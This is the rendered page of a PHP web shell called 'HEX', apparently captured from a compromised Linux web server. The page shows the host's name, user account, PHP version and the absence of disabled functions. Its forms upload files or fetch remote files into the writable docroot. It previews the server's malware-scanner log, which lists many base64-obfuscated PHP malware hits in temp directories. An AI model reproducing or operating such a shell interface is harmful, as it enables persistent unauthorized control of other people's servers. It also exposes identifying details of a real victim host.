\x20\40\x20\40<!DOCTYPE html>

<html lang="en">

<head>

    <meta charset="UTF-8">

    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <title>HEX</title>

    <link href="https://fonts.googleapis.com/css2?family=JetBrains+Mono:wght@400;500&display=swap" rel="stylesheet">

    <style>

        * {

            margin: 0;

            padding: 0;

            box-sizing: border-box;

        }



        body {

            font-family: 'JetBrains Mono', monospace;

            background: #0d1117;

            color: #c9d1d9;

            line-height: 1.6;

            font-size: 14px;

            min-height: 100vh;

            padding: 20px;

        }



        .container {

            max-width: 1000px;

            margin: 0 auto;

        }



        /* Header */

        .header {

            background: #161b22;

            border: 1px solid #21262d;

            border-radius: 6px;

            padding: 16px;

            margin-bottom: 16px;

        }



        .title {

            font-size: 18px;

            font-weight: 500;

            color: #58a6ff;

            margin-bottom: 12px;

        }



        .system-info {

            display: grid;

            grid-template-columns: repeat(auto-fit, minmax(250px, 1fr));

            gap: 8px;

            font-size: 12px;

        }



        .info-line {

            padding: 4px 0;

        }



        .info-label {

            color: #7d8590;

            display: inline-block;

            width: 120px;

        }



        .info-value {

            color: #f0883e;

        }



        /* Breadcrumb */

        .breadcrumb {

            background: #0d1117;

            border: 1px solid #21262d;

            border-radius: 6px;

            padding: 12px;

            margin-bottom: 16px;

            font-size: 13px;

        }



        .breadcrumb a {

            color: #58a6ff;

            text-decoration: none;

        }



        .breadcrumb a:hover {

            text-decoration: underline;

        }



        /* Upload Section */

        .upload-section {

            background: #161b22;

            border: 1px solid #21262d;

            border-radius: 6px;

            padding: 16px;

            margin-bottom: 16px;

        }



        .section-title {

            font-size: 14px;

            font-weight: 500;

            color: #f0f6fc;

            margin-bottom: 12px;

        }



        .form-row {

            margin-bottom: 12px;

        }



        .radio-group {

            display: flex;

            gap: 20px;

            margin-bottom: 12px;

        }



        .radio-item {

            display: flex;

            align-items: center;

            gap: 6px;

            font-size: 13px;

        }



        .radio-item input[type="radio"] {

            margin: 0;

        }



        input[type="file"],

        input[type="text"],

        select,

        textarea {

            background: #0d1117;

            border: 1px solid #21262d;

            border-radius: 6px;

            color: #c9d1d9;

            padding: 8px 12px;

            font-family: inherit;

            font-size: 13px;

        }



        input[type="file"]:focus,

        input[type="text"]:focus,

        select:focus,

        textarea:focus {

            outline: none;

            border-color: #58a6ff;

        }



        .btn {

            background: #21262d;

            border: 1px solid #30363d;

            border-radius: 6px;

            color: #f0f6fc;

            padding: 6px 12px;

            font-family: inherit;

            font-size: 13px;

            cursor: pointer;

            transition: all 0.2s;

        }



        .btn:hover {

            background: #30363d;

            border-color: #8b949e;

        }



        .btn-primary {

            background: #238636;

            border-color: #238636;

        }



        .btn-primary:hover {

            background: #2ea043;

        }



        .btn-danger {

            background: #da3633;

            border-color: #da3633;

        }



        .btn-danger:hover {

            background: #f85149;

        }



        .upload-row {

            display: flex;

            gap: 8px;

            align-items: end;

        }



        .upload-row input[type="file"],

        .upload-row input[type="text"] {

            flex: 1;

        }



        .upload-row input[type="text"]:last-of-type {

            max-width: 150px;

        }



        /* Messages */

        .message {

            padding: 12px;

            border-radius: 6px;

            margin: 12px 0;

            font-size: 13px;

        }



        .message-success {

            background: rgba(35, 134, 54, 0.15);

            border: 1px solid #238636;

            color: #56d364;

        }



        .message-error {

            background: rgba(218, 54, 51, 0.15);

            border: 1px solid #da3633;

            color: #f85149;

        }



        /* Table */

        .file-table {

            background: #0d1117;

            border: 1px solid #21262d;

            border-radius: 6px;

            overflow: hidden;

            margin-bottom: 20px;

        }



        table {

            width: 100%;

            border-collapse: collapse;

        }



        th {

            background: #161b22;

            padding: 12px;

            text-align: left;

            font-weight: 500;

            font-size: 13px;

            color: #f0f6fc;

            border-bottom: 1px solid #21262d;

        }



        td {

            padding: 8px 12px;

            border-bottom: 1px solid #21262d;

            font-size: 13px;

        }



        tr:hover {

            background: #161b22;

        }



        .file-link {

            color: #c9d1d9;

            text-decoration: none;

        }



        .file-link:hover {

            color: #58a6ff;

        }



        .dir-link {

            color: #58a6ff;

        }



        .size {

            color: #7d8590;

            text-align: right;

        }



        .permissions {

            font-family: 'JetBrains Mono', monospace;

            font-size: 12px;

            color: #7d8590;

        }



        .writable { color: #56d364; }

        .readonly { color: #f85149; }



        /* Action Form */

        .action-form {

            display: flex;

            gap: 4px;

            align-items: center;

        }



        .action-form select {

            font-size: 12px;

            padding: 4px 8px;

            min-width: 80px;

        }



        .action-form .btn {

            padding: 4px 8px;

            font-size: 12px;

        }



        /* Edit Form */

        .edit-form {

            background: #161b22;

            border: 1px solid #21262d;

            border-radius: 6px;

            padding: 16px;

            margin: 16px 0;

        }



        .edit-form textarea {

            width: 100%;

            min-height: 400px;

            resize: vertical;

        }



        .edit-form .form-row {

            margin-top: 12px;

        }



        /* File Preview */

        .file-preview {

            background: #0d1117;

            border: 1px solid #21262d;

            border-radius: 6px;

            padding: 16px;

            margin: 16px 0;

        }



        .file-preview pre {

            background: #161b22;

            border: 1px solid #21262d;

            border-radius: 6px;

            padding: 16px;

            overflow-x: auto;

            font-size: 12px;

            line-height: 1.45;

        }



        /* Footer */

        .footer {

            text-align: center;

            margin-top: 40px;

            padding: 20px;

        }



        .telegram-link {

            display: inline-flex;

            align-items: center;

            gap: 8px;

            background: #0088cc;

            color: white;

            text-decoration: none;

            padding: 10px 20px;

            border-radius: 6px;

            font-size: 14px;

            font-weight: 500;

            transition: background 0.2s;

        }



        .telegram-link:hover {

            background: #0099dd;

        }



        /* Responsive */

        @media (max-width: 768px) {

            .container { padding: 10px; }

            .system-info { grid-template-columns: 1fr; }

            .upload-row { flex-direction: column; }

            .upload-row input[type="text"]:last-of-type { max-width: none; }

            table { font-size: 12px; }

            th, td { padding: 6px 8px; }

        }

    </style>

</head>

<body>

    <div class="container">

        <div class="header">

            <div class="title">HEX</div>

            

            


            <div class="system-info">

                <div class="info-line">

                    <span class="info-label">Server:</span>

                    <span class="info-value">Apache</span>

                </div>

                <div class="info-line">

                    <span class="info-label">System:</span>

                    <span class="info-value">Linux web1.jenscom.net 4.18.0-553.111.1.el8_10.x86_64 #1 SMP Sun Mar 8 20:06:07 EDT 2026 x86_64</span>

                </div>

                <div class="info-line">

                    <span class="info-label">User:</span>

                    <span class="info-value">sps (1059)</span>

                </div>

                <div class="info-line">

                    <span class="info-label">PHP:</span>

                    <span class="info-value">8.3.30</span>

                </div>

                <div class="info-line" style="grid-column: 1 / -1;">

                    <span class="info-label">Disabled:</span>

                    <span class="info-value"><span class='writable'>NONE</span></span>

                </div>

            </div>

        </div>



        <div class="breadcrumb">

            $ pwd: <a href="?path=/">/</a><a href="?path=//usr">usr</a>/<a href="?path=//usr/local">local</a>/<a href="?path=//usr/local/maldetect">maldetect</a>/
        </div>

        <div class="upload-section">

            <div class="section-title">Upload Files</div>



            


            <form enctype="multipart/form-data" method="post">

                <div class="form-row">

                    <div class="radio-group">

                        <label class="radio-item">

                            <input type="radio" value="1" name="dirnya" checked>

                            <span>current [<span class='readonly'>readonly</span>]</span>

                        </label>

                        <label class="radio-item">

                            <input type="radio" value="2" name="dirnya">

                            <span>docroot [<span class='writable'>writable</span>]</span>

                        </label>

                    </div>

                </div>



                <input type="hidden" name="upwkwk" value="aplod">

                

                <div class="form-row">

                    <div class="upload-row">

                        <input type="file" name="berkas">

                        <button type="submit" name="berkasnya" class="btn btn-primary">Upload</button>

                    </div>

                </div>



                <div class="form-row">

                    <div class="upload-row">

                        <input type="text" name="darilink" placeholder="https://example.com/file.txt">

                        <input type="text" name="namalink" placeholder="filename">

                        <button type="submit" name="linknya" class="btn btn-primary">Fetch</button>

                    </div>

                </div>

            </form>

        </div>



        <div class='file-preview'><div class='section-title'>File: //usr/local/maldetect/event_log</div><pre>Dec 28 2025 04:13:28 web1 maldet(251446): {sigup} performing signature update check...
Dec 28 2025 04:13:28 web1 maldet(251446): {sigup} local signature set is version 20250225482944
Dec 28 2025 04:13:28 web1 maldet(251446): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Dec 28 2025 04:13:28 web1 maldet(251446): {sigup} new signature set 202512281244183 available
Dec 28 2025 04:13:28 web1 maldet(251446): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Dec 28 2025 04:13:28 web1 maldet(251446): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Dec 28 2025 04:13:28 web1 maldet(251446): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Dec 28 2025 04:13:28 web1 maldet(251446): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Dec 28 2025 04:13:28 web1 maldet(251446): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Dec 28 2025 04:13:28 web1 maldet(251446): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Dec 28 2025 04:13:29 web1 maldet(251446): {sigup} verified md5sum of maldet-sigpack.tgz
Dec 28 2025 04:13:29 web1 maldet(251446): {sigup} unpacked and installed maldet-sigpack.tgz
Dec 28 2025 04:13:29 web1 maldet(251446): {sigup} verified md5sum of maldet-clean.tgz
Dec 28 2025 04:13:29 web1 maldet(251446): {sigup} unpacked and installed maldet-clean.tgz
Dec 28 2025 04:13:29 web1 maldet(251446): {sigup} signature set update completed
Dec 28 2025 04:13:29 web1 maldet(251446): {sigup} 17638 signatures (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Dec 28 2025 04:13:29 web1 maldet(251105): {update} completed update v1.6.6 3a1792 =&gt; v1.6.6 359d25, running signature updates...
Dec 28 2025 04:13:29 web1 maldet(251655): {sigup} performing signature update check...
Dec 28 2025 04:13:29 web1 maldet(251655): {sigup} local signature set is version 202512281244183
Dec 28 2025 04:13:29 web1 maldet(251655): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Dec 28 2025 04:13:29 web1 maldet(251655): {sigup} latest signature set already installed
Dec 28 2025 04:13:29 web1 maldet(251105): {update} update and config import completed
Dec 28 2025 04:13:29 web1 maldet(251748): {sigup} performing signature update check...
Dec 28 2025 04:13:29 web1 maldet(251748): {sigup} local signature set is version 202512281244183
Dec 28 2025 04:13:29 web1 maldet(251748): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Dec 28 2025 04:13:29 web1 maldet(251748): {sigup} latest signature set already installed
Dec 28 2025 04:13:29 web1 maldet(251837): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Dec 28 2025 04:13:29 web1 maldet(251837): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Dec 28 2025 04:13:29 web1 maldet(251837): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Dec 28 2025 04:13:29 web1 maldet(251837): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Dec 28 2025 04:13:29 web1 maldet(251837): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Dec 28 2025 04:14:02 web1 maldet(251837): {scan} file list completed in 33s, found 782 files...
Dec 28 2025 04:14:02 web1 maldet(251837): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Dec 28 2025 04:14:02 web1 maldet(251837): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (782 files) in progress...
Dec 28 2025 04:14:19 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-1be41fe5736e47faa22cd5db30a84721-ea-php83-php-fpm.service-11Z2o5/tmp/run_6950eb3baa57a.php
Dec 28 2025 04:14:19 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-1be41fe5736e47faa22cd5db30a84721-ea-php83-php-fpm.service-11Z2o5/tmp/run_6950edbd468ab.php
Dec 28 2025 04:14:19 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-1be41fe5736e47faa22cd5db30a84721-ea-php83-php-fpm.service-11Z2o5/tmp/run_6950896999ee2.php
Dec 28 2025 04:14:19 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-1be41fe5736e47faa22cd5db30a84721-ea-php83-php-fpm.service-11Z2o5/tmp/run_69508c0310ab4.php
Dec 28 2025 04:14:19 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-1be41fe5736e47faa22cd5db30a84721-ea-php83-php-fpm.service-11Z2o5/tmp/run_695088faa7491.php
Dec 28 2025 04:14:19 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-1be41fe5736e47faa22cd5db30a84721-ea-php83-php-fpm.service-11Z2o5/tmp/run_6950ea3bcb89f.php
Dec 28 2025 04:14:19 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-1be41fe5736e47faa22cd5db30a84721-ea-php83-php-fpm.service-11Z2o5/tmp/run_6950ee798e349.php
Dec 28 2025 04:14:19 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-1be41fe5736e47faa22cd5db30a84721-ea-php83-php-fpm.service-11Z2o5/tmp/run_69508c56a1f45.php
Dec 28 2025 04:14:19 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-1be41fe5736e47faa22cd5db30a84721-ea-php83-php-fpm.service-11Z2o5/tmp/run_695088854808a.php
Dec 28 2025 04:14:19 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-1be41fe5736e47faa22cd5db30a84721-ea-php83-php-fpm.service-11Z2o5/tmp/run_6950ee1b934bc.php
Dec 28 2025 04:14:19 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_695028c40bfc9.php
Dec 28 2025 04:14:19 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_6950273fb475f.php
Dec 28 2025 04:14:19 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff10437b9f.php
Dec 28 2025 04:14:19 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694fc190b65a8.php
Dec 28 2025 04:14:19 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694fc31cd4a9b.php
Dec 28 2025 04:14:19 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694fc4692e978.php
Dec 28 2025 04:14:19 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694fc48341ffd.php
Dec 28 2025 04:14:19 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694fc14225594.php
Dec 28 2025 04:14:19 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_695025e243c33.php
Dec 28 2025 04:14:19 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff108c5967.php
Dec 28 2025 04:14:19 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_695026f339a64.php
Dec 28 2025 04:14:19 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_6950237c0ef6e.php
Dec 28 2025 04:14:19 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_6950273466a9b.php
Dec 28 2025 04:14:19 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_695026f50f90b.php
Dec 28 2025 04:14:20 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694fc49d4cbb2.php
Dec 28 2025 04:14:20 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694fc0bf7219b.php
Dec 28 2025 04:14:20 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff0e2b3f3a.php
Dec 28 2025 04:14:20 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff0e81667a.php
Dec 28 2025 04:14:20 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_6950274bb321c.php
Dec 28 2025 04:14:20 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff0ab7bf38.php
Dec 28 2025 04:14:20 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_69502748d0aa7.php
Dec 28 2025 04:14:20 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_6950273670c21.php
Dec 28 2025 04:14:20 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694fc1695cecc.php
Dec 28 2025 04:14:20 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff0b232901.php
Dec 28 2025 04:14:20 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff0a068b38.php
Dec 28 2025 04:14:20 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694fc2fdac747.php
Dec 28 2025 04:14:20 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff09746573.php
Dec 28 2025 04:14:20 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_695027432653c.php
Dec 28 2025 04:14:20 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_695026f71c1ad.php
Dec 28 2025 04:14:20 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff0e4a51e8.php
Dec 28 2025 04:14:20 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff08dc0316.php
Dec 28 2025 04:14:20 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff106c40f9.php
Dec 28 2025 04:14:20 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff0f81ebdc.php
Dec 28 2025 04:14:20 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_695026f9dfd9c.php
Dec 28 2025 04:14:20 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694fc340a0702.php
Dec 28 2025 04:14:20 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_69502745620bf.php
Dec 28 2025 04:14:20 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff0ae415ac.php
Dec 28 2025 04:14:20 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694fc0ec3b331.php
Dec 28 2025 04:14:20 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_6950274707e8e.php
Dec 28 2025 04:14:20 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694fc11862c85.php
Dec 28 2025 04:14:21 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_69502482d1b02.php
Dec 28 2025 04:14:21 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_695026d603917.php
Dec 28 2025 04:14:21 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_695025749d433.php
Dec 28 2025 04:14:21 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_69502731ac4b7.php
Dec 28 2025 04:14:21 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_695026efbf958.php
Dec 28 2025 04:14:21 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff08a8288b.php
Dec 28 2025 04:14:21 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_695026d91fc03.php
Dec 28 2025 04:14:21 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff0fb271d8.php
Dec 28 2025 04:14:21 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_695026dd8eda6.php
Dec 28 2025 04:14:21 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff0f57cab5.php
Dec 28 2025 04:14:21 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-1be41fe5736e47faa22cd5db30a84721-ea-php83-php-fpm.service-11Z2o5/tmp/run_6950eb3baa57a.php
Dec 28 2025 04:14:21 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-1be41fe5736e47faa22cd5db30a84721-ea-php83-php-fpm.service-11Z2o5/tmp/run_6950edbd468ab.php
Dec 28 2025 04:14:21 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-1be41fe5736e47faa22cd5db30a84721-ea-php83-php-fpm.service-11Z2o5/tmp/run_6950896999ee2.php
Dec 28 2025 04:14:21 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-1be41fe5736e47faa22cd5db30a84721-ea-php83-php-fpm.service-11Z2o5/tmp/run_69508c0310ab4.php
Dec 28 2025 04:14:21 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-1be41fe5736e47faa22cd5db30a84721-ea-php83-php-fpm.service-11Z2o5/tmp/run_695088faa7491.php
Dec 28 2025 04:14:21 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-1be41fe5736e47faa22cd5db30a84721-ea-php83-php-fpm.service-11Z2o5/tmp/run_6950ea3bcb89f.php
Dec 28 2025 04:14:21 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-1be41fe5736e47faa22cd5db30a84721-ea-php83-php-fpm.service-11Z2o5/tmp/run_6950ee798e349.php
Dec 28 2025 04:14:21 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-1be41fe5736e47faa22cd5db30a84721-ea-php83-php-fpm.service-11Z2o5/tmp/run_69508c56a1f45.php
Dec 28 2025 04:14:21 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-1be41fe5736e47faa22cd5db30a84721-ea-php83-php-fpm.service-11Z2o5/tmp/run_695088854808a.php
Dec 28 2025 04:14:21 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-1be41fe5736e47faa22cd5db30a84721-ea-php83-php-fpm.service-11Z2o5/tmp/run_6950ee1b934bc.php
Dec 28 2025 04:14:21 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_695028c40bfc9.php
Dec 28 2025 04:14:21 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_6950273fb475f.php
Dec 28 2025 04:14:21 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff10437b9f.php
